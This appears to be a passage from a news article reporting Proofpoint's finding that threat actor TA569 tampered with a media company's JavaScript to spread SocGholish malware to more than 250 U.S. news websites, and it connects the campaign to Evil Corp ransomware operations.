“The media company in question is a firm that provides both video content and advertising to major news outlets. [It] serves many different companies in different markets across the United States,” Sherrod DeGrippo, VP of threat research and detection at Proofpoint, told BleepingComputer.
“By modifying the codebase of this otherwise benign JS, it is now used to deploy SocGholish.”
In total, the malware has been installed on sites belonging to more than 250 U.S. news outlets, some of them being major news organizations, according to security researchers at enterprise security firm Proofpoint.
While the total number of impacted news organizations is currently unknown, Proofpoint says it knows of affected media organizations (including national news outlets) from New York, Boston, Chicago, Miami, Washington, D.C., and more.
We track this actor as #TA569. TA569 historically removed and reinstated these malicious JS injects on a rotating basis. Therefore the presence of the payload and malicious content can vary from hour to hour and shouldn’t be considered a false positive.
— Threat Insight (@threatinsight) November 2, 2022
“TA569 has previously leveraged media assets to distribute SocGholish, and this malware can lead to follow-on infections, including potential ransomware,” DeGrippo also told BleepingComputer.
“The situation needs to be closely monitored, as Proofpoint has observed TA569 reinfect the same assets just days after remediation.”
Link to ransomware attacks
Proofpoint has previously observed SocGholish campaigns using fake updates and website redirects to infect users, including, in some cases, ransomware payloads.
The Evil Corp cybercrime gang also used SocGholish in a very similar campaign to infect the employees of more than 30 major U.S. private firms via fake software update alerts delivered via dozens of compromised U.S. newspaper websites.
The infected computers were later used as a stepping point into the employers’ enterprise networks in attacks attempting to deploy the gang’s WastedLocker ransomware.
Luckily, Symantec revealed in a report that it blocked Evil Corp’s attempts to encrypt the breached networks in attacks targeting multiple private companies, including 30 U.S. corporations, eight of them Fortune 500 companies.
SocGholish has also recently been used to backdoor networks infected with the Raspberry Robin malware in what Microsoft described as Evil Corp pre-ransomware behavior.
Update November 02, 18:22 EDT: Added Proofpoint statement.